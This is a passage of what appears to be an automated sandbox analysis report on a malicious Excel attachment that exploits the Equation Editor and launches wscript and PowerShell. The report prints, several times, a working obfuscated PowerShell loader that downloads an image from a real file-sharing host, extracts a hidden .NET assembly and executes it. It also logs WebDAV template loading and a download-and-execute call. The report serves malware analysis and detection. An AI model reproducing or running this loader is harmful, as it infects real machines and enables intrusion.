    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: Binary string: mscorlib.pdb source: powershell.exe, 0000000D.00000002.472460335.0000000005046000.00000004.00000020.00020000.00000000.sdmp
    Source: 8A830000.0.drInitial sample: OLE indicators vbamacros = False
    Source: Pedido No 4500924462.xlsInitial sample: OLE indicators encrypted = True

    Data Obfuscation

    barindex
    Obfuscated command line found
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"Jump to behavior
    Suspicious powershell command line found
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLDdaJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysndGl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdKZjVpbWFnZVVybCA9IDdaYWh0dHBzOi8vMzEwNS5maWwnKydlbWFpbC5jb20vYScrJ3BpL2ZpbGUvZ2V0P2ZpbGVrZXk9c2hUUEhiQ1BYOG8tbE8nKyd0Q3FITEc2XzB4Q3kteGw0dG54bEFWYlE5JysnNS1kdmlUSzVjQVJhTmRRamJiM21leGZ3UXpLbVRYZyZza2lwcmVnPXRydWUmcGtfdmlkPWUwMTA5NjM4YzliZmI5NTcxNzMyNTMxMzA5YjVmZjdjIDdaYTtKZjV3ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQnKycuV2ViQ2xpZW50OycrJ0pmNWltYScrJ2dlQnl0ZXMgPSBKZjV3ZWJDbGllbnQuRG93bmxvYWREYXRhKEpmNWltYWdlVXJsKTtKZjVpbWFnZVRleHQgPSBbU3lzdGVtLlRleCcrJ3QuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhKZjVpbWFnZUJ5dCcrJ2VzKTtKZjVzdGFydEZsYWcgPSA3WmE8PEJBU0U2NF9TVEFSVD4nKyc+N1phO0pmNWVuZEZsYWcgJysnPSA3WmE8PEJBU0U2NF9FTkQ+PjdaYTtKZjVzdGFydEluZGV4ID0gSmY1aW1hZ2VUZXh0JysnLkluZGV4T2YoSmY1c3RhcnRGbGFnKTtKZjVlbmRJbmRleCA9IEpmNWltYWdlVGV4dC5JbmRleE9mKEonKydmNWVuZEZsYWcpO0pmNXN0YXJ0SW5kZXggLWdlIDAgLWFuZCBKZjVlbmRJbmQnKydleCAtZ3QgSmY1c3RhcnRJbmRleDtKZjVzdGFydEluZGV4ICs9IEpmNXN0YXJ0RmxhZy5MZW5ndCcrJ2g7SmY1YmFzZTY0TGVuZ3RoID0gSmYnKyc1ZW5kSW5kZXggLSBKZjUnKydzdGFydEluZCcrJ2V4O0pmNWJhc2U2NENvbW1hbmQgPScrJyBKZjUnKydpbWFnZVRleHQuU3Vic3RyaW5nKEpmNXN0YXJ0SW5kZXgsIEpmNWJhJysnc2U2NExlbmd0aCk7SmY1YmFzZTYnKyc0UmV2ZXJzZWQgPSAtaicrJ29pbiAoSmY1YmFzZTYnKyc0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFFHMCBGb3JFYWNoLU9iamVjdCcrJyB7IEpmNV8gfSlbLTEuLi0oSmY1JysnYmFzJysnZTY0Q29tbWFuZC5MZW5ndGgpXTtKZjVjb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKEpmNWJhc2U2NFJldmVyc2VkKTtKZjVsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseScrJ106OkxvYWQoSmY1Y29tbWFuZEJ5dGVzKTtKZjV2YWlNZXRob2QnKycgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKDdaYVZBSTdaYSk7SmY1dmFpTWV0aG9kLkludm9rZShKZjVudWxsLCBAKDdaYXR4dC5SVENDQ1JWLzYyMi81MTIuODIxLjU5LjMyLy86cCcrJ3R0aDdaYSwgN1phZGVzYXRpdmFkbzdaYSwgN1phZGVzYXQnKydpdmFkbzdaYSwgN1phZGVzYXRpdicrJ2FkbzdaYSwgN1phYXMnKydwbmUnKyd0X2NvbXBpbGVyN1phLCA3WmFkZXNhdGl2YWRvN1phLCA3WmFkZXNhdGl2YWRvN1phLDdaJysnYWRlc2F0aXZhZCcrJ283WmEsN1phJysnZGVzYXQnKydpdmFkbzdaYSw3WmFkZXNhJysndGl2YWRvN1phLDdaYWRlc2F0aXZhZG83WmEsN1phZGVzYXRpdmEnKydkbzdaYSw3WmExN1phLDdaYWRlc2F0aXZhZG83WmEpKTsnKS5SRVBsQWNlKCdKZjUnLFtTdHJpTkddW0NoQVJdMzYpLlJFUGxBY2UoJzdaYScsW1N0cmlOR11bQ2hBUl0zOSkuUkVQbEFjZSgoW0NoQVJdODErW0NoQVJdNzErW0NoQVJdNDgpLFtTdHJpTkddW0NoQVJdMTI0KSB8IC4oICRwc2hPbUVbMjFdKyRwU0hPbWVbMzBdKyd4Jyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_002321C8 push ebx; iretd 13_2_002321EA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_002325E1 push ebx; retf 13_2_002325EA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_00400B48 pushad ; ret 13_2_00400F89

    Persistence and Installation Behavior

    barindex
    Microsoft Office launches external ms-search protocol handler (WebDAV)
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\ljg.cl@SSL\DavWWWRootJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\ljg.cl@SSL\DavWWWRootJump to behavior
    Office drops RTF file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile dump: seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestof[1].doc.0.drJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile dump: B7AFCBA1.doc.3.drJump to dropped file
    Office viewer loads remote template
    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXESection loaded: netapi32.dll and davhlpr.dll loadedJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 9_2_035705DC URLDownloadToFileW,ShellExecuteW,ExitProcess,9_2_035705DC
